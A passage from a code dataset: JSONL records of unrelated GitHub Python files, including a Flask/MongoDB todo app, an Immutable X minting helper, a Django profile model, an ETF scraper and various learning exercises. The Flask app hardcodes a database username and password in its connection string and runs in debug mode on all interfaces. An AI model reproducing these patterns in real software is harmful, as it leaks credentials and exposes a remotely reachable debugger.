Попробуйте еще раз')\n            continue\n        else:\n            break\n    time.sleep(0.8)\n    return choice\n\n\ndef nested_list_analysis(my_list):\n    \"\"\"Check for nested lists\"\"\"\n    if isinstance(my_list[0], list):\n        return my_list[0]\n    else:\n        return my_list\n","repo_name":"Laztrex/simple-dungeon","sub_path":"dungeon_source/represent_data.py","file_name":"represent_data.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15725129678","text":"\"\"\"\n    finditer demo\n\"\"\"\nimport re\n\ns = \"1949年10月1日,中华人民共和国成立\"\n\n# use finditer from the re module\nit = re.finditer(r'\\d+', s)\nfor i in it:\n    print(i.group())\n\n# call finditer on a compiled pattern object\nregex = re.compile(r'\\d+')\nitem = regex.finditer(s)\nfor i in item:\n    print(i.group())\n","repo_name":"jiangrry/study","sub_path":"Month2/RE/2-5-PYTHON_RE/03-demo-finditer.py","file_name":"03-demo-finditer.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42437609778","text":"from flask import Flask, render_template, request, jsonify\napp = Flask(__name__)\n\nfrom pymongo import MongoClient\nimport certifi\n\nclient = MongoClient('mongodb+srv://sparta:test@cluster0.wfmkath.mongodb.net/?retryWrites=true&w=majority', tlsCAFile=certifi.where())\ndb = client.dbsparta\n\n@app.route('/')\ndef home():\n    return render_template('index.html')\n\n@app.route(\"/icon\", methods=[\"POST\"])\ndef icon_post():\n    src_receive = request.form['src_give']\n    day_receive = request.form['day_give']\n    month_receive = request.form['month_give']\n    year_receive = request.form['year_give']\n    doc = {\n        'src': src_receive,\n        'day': day_receive,\n        'month': month_receive,\n        'year': year_receive\n    }\n    db.icon.insert_one(doc)\n    return jsonify({'msg': '저장 완료!'})\n    \n@app.route(\"/icon\", methods=[\"GET\"])\ndef icon_get():\n    all_icons = list(db.icon.find({},{'_id':False}))\n    return jsonify({'result': all_icons})\n\n@app.route(\"/todo\", methods=[\"POST\"])\ndef todo_post():\n    todolist_receive = request.form['todolist_give']\n    day_receive = request.form['day_give']\n    month_receive = request.form['month_give']\n    year_receive = request.form['year_give']\n    doc = {\n        'todo':todolist_receive,\n        'day': day_receive,\n        'month': month_receive,\n        'year': year_receive\n    }\n    db.todo.insert_one(doc)\n    return jsonify({'msg': '저장 연결 완료!'})\n\n@app.route(\"/todo\", methods=[\"GET\"])\ndef todo_get():\n    all_todo = list(db.todo.find({},{'_id':False}))\n    return jsonify({'result': all_todo})\n\n@app.route(\"/todo-delete\", methods=[\"POST\"])\ndef todo_delete():\n    todolist_receive = request.form['todolist_give']\n    day_receive = request.form['day_give']\n    month_receive = request.form['month_give']\n    year_receive = request.form['year_give']\n    print(todolist_receive, day_receive, month_receive, year_receive)\n    doc = {\n        'todo':todolist_receive,\n        'day': day_receive,\n        'month': month_receive,\n        'year': year_receive\n    }\n    db.todo.delete_one(doc)\n    return jsonify({'msg': '삭제 완료!'})\n\n@app.route(\"/diary\", methods=[\"POST\"])\ndef diary_post():\n    diary_receive = request.form['diary_give']\n    day_receive = request.form['day_give']\n    month_receive = request.form['month_give']\n    year_receive = request.form['year_give']\n    db.diary.delete_one({'day': day_receive, 'month': month_receive, 'year': year_receive})\n    doc = {\n        'diary': diary_receive,\n        'day': day_receive,\n        'month': month_receive,\n        'year': year_receive\n    }\n    
db.diary.insert_one(doc)\n    return jsonify({'msg': '저장 연결 완료!'})\n\n@app.route(\"/diary\", methods=[\"GET\"])\ndef diary_get():\n    all_diary = list(db.diary.find({},{'_id':False}))\n    return jsonify({'result': all_diary})\n\nif __name__ == '__main__':\n    app.run('0.0.0.0', port=5001, debug=True)","repo_name":"hyesueng/todo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29908004037","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('yandex_data/harvard.csv')\n\n# plot the time series\nplt.plot(data['Период'], data['Абсолютное'])\n\n# add a title and axis labels\nplt.title('График временного ряда по запросу Гарвард')\nplt.xlabel('Период')\nplt.ylabel('Абсолютное')\n\n# save the plot to disk\nplt.savefig('my_plot.png')","repo_name":"oskvorcova/final_project_python","sub_path":"drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26430805300","text":"#word vectors with spaCy\n'''\nIn this exercise you'll get your first experience with word vectors!\n\nYou're going to use the ATIS dataset, which contains thousands of sentences\nfrom real people interacting with a flight booking system.\n\nThe user utterances are available in the list sentences, and the corresponding\nintents in labels.\n\nYour job is to create a 2D array X with as many rows as there are sentences in\nthe dataset, where each row is a vector describing that sentence.\n\n'''\n# Load the spacy model: nlp\nnlp = spacy.load('en')\n\n# Calculate the length of sentences\nn_sentences = len(sentences)\n\n# Calculate the dimensionality of nlp\nembedding_dim = nlp.vocab.vectors_length\n\n# Initialize the array with zeros: X\nX = np.zeros((n_sentences, embedding_dim))\n\n# Iterate over the sentences\nfor idx, sentence in enumerate(sentences):\n    # Pass each sentence to the nlp object to create a document\n    doc = nlp(sentence)\n    # Save the document's .vector attribute to the corresponding row in X\n    X[idx, :] = doc.vector\n","repo_name":"kaushalpowar/nlp_learning","sub_path":"word_vect_spacy.py","file_name":"word_vect_spacy.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9117042632","text":"from flask import request\nfrom flask_restful import Resource\nimport json\n\nskills = [{\"name\": \"Python\", \"id\": 1}]\n\nclass Skills(Resource):\n    def get(self):\n        skills.sort(key=lambda skill: skill.get(\"id\"))\n        return skills\n\n    def post(self):  # It's adding duplicated skills\n        data = json.loads(request.data)\n        skills = Skills.get(\"get\")\n\n        for skill in skills:\n            if skill.get(\"name\").lower() == data.get(\"name\").lower():\n                response = {\"message\": f\"{data.get('name')} already exists in skills\"}\n                return response\n\n        else:\n            last_id = 0\n\n            for index, skill in enumerate(skills):\n                if skill.get(\"id\") - last_id != 1 and index != 0:\n                    data[\"id\"] = index + 1\n                    break\n\n            else:\n                data[\"id\"] = len(skills) + 1\n\n            last_id = skill.get(\"id\")\n\n            skills.append(data)\n            return data\n\nclass SkillsAddAndRemove(Resource):\n    def get(self, id):  # It's not fetching the skill during the API test\n        for skill in skills:\n            if skill.get(\"id\") == id:\n                return skill\n\n        else:\n            message = f\"This id {id} doesn't have a corresponding 
skill\"\n            response = {\"status\": \"error\", \"message\": message}\n            return response\n\n    def put(self, id):  # It's not renaming skills added during the API test\n        data = json.loads(request.data)\n\n        for skill in skills:\n\n            if skill.get(\"id\") == id:\n                skill[\"name\"] = data\n                return skill\n\n        else:\n            response = {\"status\": \"error\", \"message\": f\"Skill id {id} does not exist\"}\n            return response\n\n    def delete(self ,id):\n        response = {\"status\": \"ok\", \"message\": f\"Skill {id} deleted\"}\n\n        for index, skill in enumerate(skills):\n            if skill.get(\"id\") == id:\n                skills.pop(index)\n                return response\n","repo_name":"FelipeMatheus1999/python-flask-api-test","sub_path":"skills.py","file_name":"skills.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17842560572","text":"## Required packages: eth-account pysha3 requests\n\nfrom eth_account.messages import encode_defunct\nfrom eth_account import Account\nimport sha3\nimport json, copy\nimport requests\n\nclass Minter:\n    def __init__(self, private_key, network = \"testnet\"):\n        self.private_key = private_key\n        self.network = network\n        self.account = Account.from_key(self.private_key)\n\n    def _formatRoyalties(self, _royalty):\n        royalty = {\"recipient\": _royalty[\"recipient\"].lower()}\n        fee = _royalty[\"percentage\"]\n        if isinstance(fee, int):\n            royalty[\"percentage\"] = fee\n        else:\n            _fee = float(fee)\n            if _fee.is_integer():\n                royalty[\"percentage\"] = int(_fee)\n            else:\n                royalty[\"percentage\"] = _fee\n\n        return royalty\n\n    def _parseTokens(self, _token):\n        if _token.get(\"royalties\", False):\n            _token[\"royalties\"] = list(map(self._formatRoyalties, _token[\"royalties\"]))\n\n        return _token\n\n    def _parseUsers(self, user):\n        user[\"ether_key\"] = user[\"ether_key\"].lower()\n        user[\"tokens\"] = list(map(self._parseTokens, user[\"tokens\"]))\n        return user\n\n\n    def _formatMessage(self, payload):\n        signature_payload = {\"contract_address\": payload[\"contract_address\"].lower()}\n\n        if payload.get(\"royalties\", False):\n            signature_payload[\"royalties\"] = list(map(self._formatRoyalties, payload[\"royalties\"]))\n\n        signature_payload[\"users\"] = list(map(self._parseUsers, payload[\"users\"]))\n        signature_payload[\"auth_signature\"] = \"\"\n\n        return json.dumps(signature_payload, separators=(',', ':'))\n\n    def _hashMessage(self, message):\n        hashed = sha3.keccak_256()\n        hashed.update(str.encode(message))\n        return \"0x\" + hashed.hexdigest()\n\n    def _fixSignature(self, signature):\n        start = signature[:-2]\n        end = signature[len(signature) - 2:]\n        parsed_end = int(end, 16)\n        if parsed_end > 1:\n            end = \"0\" + str(1 - parsed_end % 2)\n\n        return start + end\n\n    def _renameUsers(self, user):\n        user[\"user\"] = user[\"ether_key\"].lower()\n        del user[\"ether_key\"]\n        user[\"tokens\"] = list(map(self._parseTokens, user[\"tokens\"]))\n        return user\n\n    def _fixPayload(self, payload, signature):\n        new_payload = {\"auth_signature\": signature, \"contract_address\": payload[\"contract_address\"].lower()}\n\n        if payload.get(\"royalties\", False):\n            new_payload[\"royalties\"] = list(map(self._formatRoyalties, payload[\"royalties\"]))\n\n        new_payload[\"users\"] = list(map(self._renameUsers, payload[\"users\"]))\n\n        return new_payload\n\n    def generateAuthSignature(self, payload):\n        message = self._formatMessage(payload)\n        hashed_message = self._hashMessage(message)\n        raw_signature = 
 (self.account.sign_message(encode_defunct(text=hashed_message))).signature.hex()\n        auth_signature = self._fixSignature(raw_signature)\n        return auth_signature\n    \n    def generateMintPayload(self, payload):\n        auth_signature = self.generateAuthSignature(payload)\n        return self._fixPayload(payload, auth_signature)\n    \n\n    def mint(self, payload):\n        parsed_payload = self.generateMintPayload(payload)\n\n        res = requests.post(\n            f'https://api{\".sandbox\" if self.network.lower() == \"testnet\" else \"\"}.x.immutable.com/v2/mints',\n            headers={\"Content-Type\": \"application/json\"},\n            json=[parsed_payload]\n        )\n        \n        return res.json()","repo_name":"8bNFT/incomplete-guide-to-imx","sub_path":"mint_sdk/python/imx_minter.py","file_name":"imx_minter.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"21"}
{"seq_id":"18518347753","text":"class Solution:\n    # @param A : list of integers\n    # @param B : integer\n    # @return an integer\n    def solve(self, A, B):\n        good_array_count = 0\n\n        n = len(A)\n\n        for s in range(n):\n            sub_array_sum = 0\n            for e in range(s, n):\n                no_of_elements = e - s + 1\n                sub_array_sum += A[e]\n\n                if no_of_elements % 2 == 0:\n                    if sub_array_sum < B:\n                        good_array_count += 1\n                else:\n                    if sub_array_sum > B:\n                        good_array_count += 1\n\n        return good_array_count\n\n\nif __name__ == '__main__':\n    A = [1, 2, 3, 4, 5]\n    B = 4\n\n    # A = [13, 16, 16, 15, 9, 16, 2, 7, 6, 17, 3, 9]\n    # B = 65\n\n    print(Solution().solve(A=A, B=B))\n","repo_name":"vinay-yadav/Introduction_To_DSA","sub_path":"2. Array/SubArray/5. Good Subarrays Easy.py","file_name":"5. Good Subarrays Easy.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"33801956667","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef polar():\n    # plot a figure in polar coordinates\n    r = np.arange(1, 6, 1)\n    theta = np.arange(0, 2.1, 0.5) * np.pi\n    fig = plt.figure()\n    ax = fig.add_subplot(111, projection='polar')\n    ax.plot(theta, r, color='r', linewidth=1)\n    ax.grid(True)\n    plt.show()\n\n    # r = np.empty(5).fill(5)  # create a length-5 array filled with the value 5\n\n\nif __name__ == '__main__':\n    polar()","repo_name":"Lovecanon/ProfessionalPython","sub_path":"Matplotlib/Lesson12Polar.py","file_name":"Lesson12Polar.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"36278445980","text":"\"\"\"\nInput a full name\nPrint it with initial letters capitalized and the given name in UPPERCASE\n\"\"\"\nhoten=input(\"Nhập họ và tên: \")\nwhile hoten.replace(\" \",\"a\").isalpha()==False or len(hoten)==0:\n    hoten=input(\"Nhập sai!!!
 Mời nhập lại: \")\n\nhovaten=hoten.split()\nho=hovaten[0].capitalize()\ndem=\"false\"\n\nif len(hovaten)==2:\n    ten=hovaten[1].upper()\nelif len(hovaten)>=3:\n    ten=hovaten[-1].upper()\n    dem=hovaten[1:-1]\n    dem=\" \".join(dem)\n    dem=dem.title()\n    \nif dem==\"false\":\n    print(ho,ten,sep=\" \")\nelse: print(ho,dem,ten,sep=\" \")\n","repo_name":"phong516/Python","sub_path":"OOP/deadline/bai8.py","file_name":"bai8.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"25882074897","text":"import requests\nfrom colorama import Fore\n\nclass Person:\n    def __init__(self, nat, gen):\n        r = requests.get(\"https://randomuser.me/api/?nat=\" + nat + '&gender=' + gen)\n        res = r.json()\n        self.name = res[\"results\"][0][\"name\"][\"first\"]\n        self.surename = res[\"results\"][0][\"name\"][\"last\"]\n        self.age = res[\"results\"][0][\"dob\"][\"age\"]\n        self.phone = res[\"results\"][0][\"phone\"]\n        self.email = res[\"results\"][0][\"email\"]\n        self.isMale = res[\"results\"][0][\"gender\"] == \"male\"\n        self.nation = nat\n    \n    def print_person(self):\n        if self.isMale:\n            print(Fore.CYAN)\n        else:\n            print(Fore.MAGENTA)\n        print(self.name)\n        print(self.surename)\n        print(self.age)\n        print(self.phone)\n        print(self.email)\n        print(self.isMale)\n        print(self.nation)\n\ntry:\n    a = input(\"ckilku treba pratcuvnukiv?\")\n    a = int(a)\nexcept:\n    print(\"ne choje na chufru\")\n    a = input(\"ckilku treba pratcuvnukiv?\")\n    a = int(a)\n\n# decide the gender of the team\nm = input(\"Tilku choloviku?\")\ngen = \"male\"\n\nif m == \"-\":\n    gen = \"female\"\n\n\nrabotnici = []\n\n# generate the team\nwhile a != 0:\n    n = input(\"vvedit nasionalnict\")\n    p = Person(n, gen)\n    rabotnici.append(p)\n    a -= 1\n\n# print out each worker's details\nfor p in rabotnici:\n    p.print_person()\n\n\n\n\n    ","repo_name":"dddd111ddd1d/banana_vtoroy-2_versiya-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40215263677","text":"# Stopwatch: The Game\nimport simplegui\n\n# define global variables\ntime = 0\ntotal = 0\nsuccess = 0\n\n# define helper function format that converts time\n# in tenths of seconds into formatted string A:BC.D\ndef format(val):\n    m = val / 600\n    s = (val % 600) / 10\n    ms = val % 10\n    str_s = str(s) if s > 9 else \"0\" + str(s)\n    return str(m) + \":\" + str_s + \".\" + str(ms)\n    \n# define event handlers for buttons; \"Start\", \"Stop\", \"Reset\"\ndef start():\n    timer.start()\n\ndef stop():\n    if timer.is_running() == False: return\n    global success, total\n    timer.stop()\n    total += 1\n    if time % 10 == 0: \n        success += 1\n\ndef reset():\n    global time, success, total\n    timer.stop()\n    time = 0\n    success = 0\n    total = 0\n\n# define event handler for timer with 0.1 sec interval\ndef tick():\n    global time\n    time += 1\n\n# define draw handler\ndef draw(canvas):\n    canvas.draw_text(format(time), (50, 100), 35, 'White')\n    result = str(success) + \"/\" + str(total)\n    canvas.draw_text(result, (130, 30), 20, 'Green')\n    \n# create frame\nframe = simplegui.create_frame(\"Stopwatch\", 200, 150)\ntimer = simplegui.create_timer(100, tick)\n\n# register event handlers\nframe.set_draw_handler(draw)\nframe.add_button('Start', start, 100)\nframe.add_button('Stop', stop, 100)\nframe.add_button('Reset', reset, 100)\n\n# start
frame\nframe.start()\n","repo_name":"pengrad/coursera-python","sub_path":"3-Stopwatch.py","file_name":"3-Stopwatch.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70926388212","text":"from django.db import models\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom collections import defaultdict\nfrom django.core.files.images import get_image_dimensions\nimport re\n\n\nclass Profile(models.Model):\n\n owner = models.OneToOneField(User, on_delete=models.CASCADE)\n email_verified = models.BooleanField(default=False)\n is_banned = models.BooleanField(default=False)\n tracker = models.CharField(max_length=255, blank=True)\n image = models.ImageField(\n upload_to='avatars/', default='default/awaiting_image_lcpknr'\n )\n created_at = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['-owner']\n\n def __str__(self):\n return f\"{self.owner}'s profile\"\n\n def clean(self, request):\n \"\"\"\n Validates data being saved to Post model.\n - image file size: Cannot be over 2mb.\n - image height: Cannot be over 1080 pixels.\n - tracker: regx match check\n\n Decorators:\n None\n Args:\n None\n Returns:\n None\n \"\"\"\n # defaultdict auto creates key first time it is accessed.\n errors = defaultdict(list)\n if 'image' in request.data:\n max_size = 2 * 1024 * 1024 # 2MB\n max_height = 1080\n width, height = get_image_dimensions(self.image)\n # Check file size not too large.\n if self.image.size > max_size:\n errors['image'].append(\n 'The image file should not exceed 2MB.')\n # Check the height.\n if height > max_height:\n errors['image'].append(\n 'The image height cannot exceed 1080 pixels.')\n if 'tracker' in request.data:\n print(request.data['tracker'])\n pattern = r'[a-zA-Z0-9 ]{0,30}#[a-zA-Z0-9]{1,5}'\n if not re.match(pattern, request.data['tracker']):\n errors['tracker'].append(\n ('Format is incorrect, please check and follow '\n 'instructions.'))\n\n # If any above errors, raise ValidationError\n if errors:\n raise ValidationError(errors)\n\n\ndef create_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(owner=instance)\n\n\npost_save.connect(create_profile, sender=User)\n","repo_name":"BobWritesCode/SquadUp_api","sub_path":"profiles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27553533295","text":"from scholarship_data import DATA\r\n\r\n\r\nclass Bachelor:\r\n\r\n def __init__(self, full_name, group_number, mid_score):\r\n self.full_name = full_name\r\n self.group_number = group_number\r\n self.mid_score = mid_score\r\n self.DATA = DATA\r\n\r\n def get_scholarship_for_bachelor(self):\r\n for item in self.DATA: \r\n self.min_mark = item['min_mark']\r\n self.max_mark = item['max_mark']\r\n if self.mid_score == self.max_mark: # оценка 5 \r\n return item['scholarship_bachelor']\r\n if self.min_mark < self.mid_score < self.max_mark: # оценка в пределах (4 ; 5) \r\n return item['scholarship_bachelor']\r\n if self.min_mark < self.mid_score <= self.max_mark: # оценка в пределах (3 ; 4]\r\n return item['scholarship_bachelor']\r\n return 'студент без стипендии:('\r\n\r\n\r\nclass Postgraduate(Bachelor):\r\n\r\n def get_scholarship_for_postgraduate(self):\r\n for item in self.DATA: \r\n self.min_mark = 
item['min_mark']\r\n self.max_mark = item['max_mark']\r\n if self.mid_score == self.max_mark: \r\n return item['scholarship_postgraduate']\r\n if self.min_mark < self.mid_score < self.max_mark: \r\n return item['scholarship_postgraduate']\r\n if self.min_mark < self.mid_score <= self.max_mark: \r\n return item['scholarship_postgraduate']\r\n return 'студент без стипендии:('\r\n\r\n\r\n# # для теста раскомментить\r\n# a = Bachelor('Иванов Иван Иванович', 1011, 3) # средний балл студента бакалавра \r\n# b = Postgraduate('Демидов Демид Демидович',2011, 4.22) # средний балл студента аспиранта\r\n# print(a.get_scholarship_for_bachelor()) \r\n# print(b.get_scholarship_for_postgraduate())","repo_name":"dolgverni/OOP_scholarship","sub_path":"with_oop.py","file_name":"with_oop.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15787731362","text":"# -*- coding: utf-8 -*-\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nmnist = input_data.read_data_sets('MNIST_data', validation_size=0, one_hot= False)\r\n\r\nimg = mnist.train.images[20]\r\nplt.imshow(img.reshape((28,28)))\r\n\r\n\r\n# set the input parameter\r\nhidden_units = 64\r\ninput_units = mnist.train.images.shape[1]\r\n\r\n# 由于AutoEncoder是对源输入的复现,因此这里的输出层数据与输入层数据相同\r\ninputs_ = tf.placeholder(tf.float32, (None,input_units), name = 'inputs_')\r\ntargets_ = tf.placeholder(tf.float32, (None,input_units), name = 'targets_')\r\n\r\n# the hidden layer\r\nhidden_ = tf.layers.dense(inputs_, hidden_units, activation=tf.nn.relu)\r\n\r\n# the output layer\r\nlogits_ = tf.layers.dense(hidden_, input_units, activation=None)\r\noutputs_ = tf.sigmoid(logits_, name='outputs_')\r\n\r\n# loss function\r\nloss = tf.nn.sigmoid_cross_entropy_with_logits(labels=targets_,logits= logits_)\r\ncost = tf.reduce_mean(loss)\r\n\r\n# optimization\r\nlearning_rate = 0.01\r\noptimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)\r\n\r\n# start training\r\nsess = tf.Session()\r\nepochs = 20\r\nbatch_size = 128\r\nsess.run(tf.global_variables_initializer())\r\nfor e in range(epochs):\r\n for idx in range(mnist.train.num_examples//batch_size):\r\n batch = mnist.train.next_batch(batch_size)\r\n batch_cost, _ = sess.run([cost, optimizer],\r\n feed_dict={inputs_:batch[0],\r\n targets_:batch[0]})\r\n print(\"Epoch: {}/{}\" . 
format(e+1,epochs),\r\n \"Training loss: {:.4f}\" .format(batch_cost))\r\n\r\nfig, axes = plt.subplots(nrows=2, ncols=5, sharex=True, sharey=True, figsize=(20,8))\r\ntest_imgs = mnist.test.images[:5]\r\nreconstructed, compressed = sess.run([outputs_, hidden_],\r\n feed_dict={inputs_: test_imgs})\r\n\r\nfor image, row in zip([test_imgs, reconstructed], axes):\r\n for img, ax in zip(image, row):\r\n ax.imshow(img.reshape((28, 28)))\r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\n\r\nfig.tight_layout(pad=0.1)\r\n\r\nfig, axes = plt.subplots(nrows=1, ncols=5, sharex=True, sharey=True, figsize=(20,4))\r\nfor img, ax in zip(compressed, axes):\r\n ax.imshow(img.reshape((8,8)))\r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\nfig.tight_layout(pad=0)","repo_name":"nabil1994/auto_encoder","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73246650931","text":"import copy\nimport re\n\nfrom .base import BaseAPI, HtmlTableParser, strip_html_tags\nfrom .exceptions import DataException, SymbolNotFound\n\n\nclass EtfDb(BaseAPI):\n \"\"\"\n EtfDb.com\n \"\"\"\n\n def get_basic_info(self):\n \"\"\"\n Returns basic info about the given ETF. The info is:\n\n - Issuer\n - Brand\n - Structure\n - Expense Ratio\n - Inception\n - Index Tracked\n - Category\n - Leveraged\n - Asset Class\n - Asset Class Size\n - Region (General)\n - Region (Specific)\n - Description\n - Assets Under Management\n\n :return: ETF basic info as a dict.\n :rtype: dict\n \"\"\"\n\n # Get HTML.\n try:\n html = self._get(\n f\"https://etfdb.com/etf/{self.symbol.upper()}/#etf-ticker-profile\"\n )\n except Exception as e:\n raise SymbolNotFound from e\n\n finds = re.findall(\n r\"class=\\'ticker-assets\\'.*?>(.*?)[^<]*\", html.text, re.DOTALL\n )\n\n # Check if the HTML contains only two occurrences.\n if 0 == len(finds):\n raise SymbolNotFound\n if 2 < len(finds):\n raise DataException(\n \"More that two occurrences found in HTML - don't know what to do now\"\n )\n\n # Process 1st list.\n list_items = re.findall(r\"(.*?)\", finds[0], re.DOTALL)\n list_items = [strip_html_tags(i) for i in list_items]\n data = dict(zip(list_items[::2], list_items[1::2]))\n\n # Process 2nd list.\n list_items = re.findall(r\"(.*?)\", finds[1], re.DOTALL)\n list_items = [strip_html_tags(i) for i in list_items]\n data |= dict(zip(list_items[::2], list_items[1::2]))\n\n for key in copy.deepcopy(data).keys():\n if key not in [\n \"Issuer\",\n \"Brand\",\n \"Structure\",\n \"Expense Ratio\",\n \"Inception\",\n \"Index Tracked\",\n \"Category\",\n \"Leveraged\",\n \"Asset Class\",\n \"Asset Class Size\",\n \"Region (General)\",\n \"Region (Specific)\",\n ]:\n del data[key]\n\n # Fetch description.\n finds = re.findall(\n r\"id='analyst-report'>.*?
<p>(.+?)</p>
\", html.text, re.DOTALL\n )\n\n # Check if the HTML contains only ine occurrences.\n if 0 == len(finds):\n raise SymbolNotFound\n if 1 < len(finds):\n raise DataException(\n \"More that one occurrences found in HTML - don't know what to do now\"\n )\n\n data[\"Description\"] = strip_html_tags(finds[0])\n\n # ASM\n finds = re.findall(\n r\"AUM[^<]+]+>([^<]+)\", html.text, re.DOTALL\n )\n\n # Check if the HTML contains only one occurrences.\n if 0 == len(finds):\n raise SymbolNotFound\n if 1 < len(finds):\n raise DataException(\n \"More that one occurrences found in HTML - don't know what to do now\"\n )\n\n data[\"Assets Under Management\"] = finds[0]\n\n # 52 week hi/low.\n finds = re.findall(\n r\"52 Week Lo[^<]+]+>([^<]+)\", html.text, re.DOTALL\n )\n\n # Check if the HTML contains only one occurrences.\n if 0 == len(finds):\n raise SymbolNotFound\n if 1 < len(finds):\n raise DataException(\n \"More that one occurrences found in HTML - don't know what to do now\"\n )\n\n data[\"Year Low\"] = finds[0]\n\n finds = re.findall(\n r\"52 Week Hi[^<]+]+>([^<]+)\", html.text, re.DOTALL\n )\n\n # Check if the HTML contains only one occurrences.\n if 0 == len(finds):\n raise SymbolNotFound\n if 1 < len(finds):\n raise DataException(\n \"More that one occurrences found in HTML - don't know what to do now\"\n )\n\n data[\"Year High\"] = finds[0]\n\n return data\n\n def get_holdings(self):\n \"\"\"\n Returns ETF holdings (15 at max) list where each item is a list with items:\n\n - symbol\n - stock name\n - percentage\n \"\"\"\n try:\n html = self._get(f\"https://etfdb.com/etf/{self.symbol.upper()}/#holdings\")\n except Exception as e:\n raise SymbolNotFound from e\n\n finds = re.findall(\n r\"]*etf-holdings[^>]*>(.*?)\", html.text, re.DOTALL\n )\n\n if not finds:\n raise DataException(\"No holdings found.\")\n\n finds = re.findall(r\"(.*?)\", finds[0], re.DOTALL)\n rows = []\n\n if finds:\n parser = HtmlTableParser(3)\n parser.feed(finds[0])\n\n rows = parser.get_data()\n\n return rows\n","repo_name":"im-n1/rug","sub_path":"rug/etfdb.py","file_name":"etfdb.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"15459263612","text":"import pandas as pd\r\n\r\n# Read data\r\ndata = pd.read_csv(\"housing_RT.csv\", index_col=0)\r\ndata.iloc[1:5,]\r\n\r\n#Using hold-out to percific data trained\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(data.iloc[:,1:5], data.iloc[:,0],\r\ntest_size = 1/3.0, random_state=100)\r\nX_train[1:5]\r\nX_test[1:5]\r\n\r\n# Building model for training\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nregressor = DecisionTreeRegressor(random_state = 0)\r\nregressor.fit(X_train, y_train)\r\n\r\n# Predict and judge the model\r\ny_pred = regressor.predict(X_test)\r\ny_test[1:5]\r\ny_pred[1:5]\r\n\r\n# Chi so MSE\r\nfrom sklearn.metrics import mean_squared_error\r\nerr = mean_squared_error(y_test, y_pred)\r\nerr\r\n\r\n# Chi so RMSE\r\n","repo_name":"greatMonster11/CT202","sub_path":"Day3-NavieBayes/housing_RT.py","file_name":"housing_RT.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30472484480","text":"\"\"\"\nThis is the module for gravitational wave coherent search.\nWriter: Shallyn(shallyn.liu@foxmail.com)\n\"\"\"\n\nimport numpy as np\nfrom .._core import resample\nfrom scipy.signal import resample as 
scipy_resample\nfrom scipy.interpolate import interp1d, interp2d\nfrom .._utils import interp2d_complex, LOGGER\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import BoundaryNorm\nfrom matplotlib.ticker import MaxNLocator\nfrom matplotlib import gridspec\n\n\nclass Series(object):\n def __init__(self, value, deltax, info = 'Series'):\n value = np.asarray(value)\n if (len(value.shape) != 1 and value.shape[0] != 1):\n raise Exception(f'Shape error: {value.shape}')\n self._value = value\n self._deltax = deltax\n self._info = info\n \n @property\n def value(self):\n return self._value\n \n @property\n def deltax(self):\n return self._deltax\n\n def __len__(self):\n return len(self._value)\n\n def __abs__(self):\n return abs(self._value)\n\n @property\n def size(self):\n return self._value.size\n \n @property\n def x(self):\n return np.arange(0, self.length, self._deltax)\n\n @property\n def length(self):\n return self._deltax * len(self)\n\n @property\n def real(self):\n return Series(self._value.real, self._deltax, info = 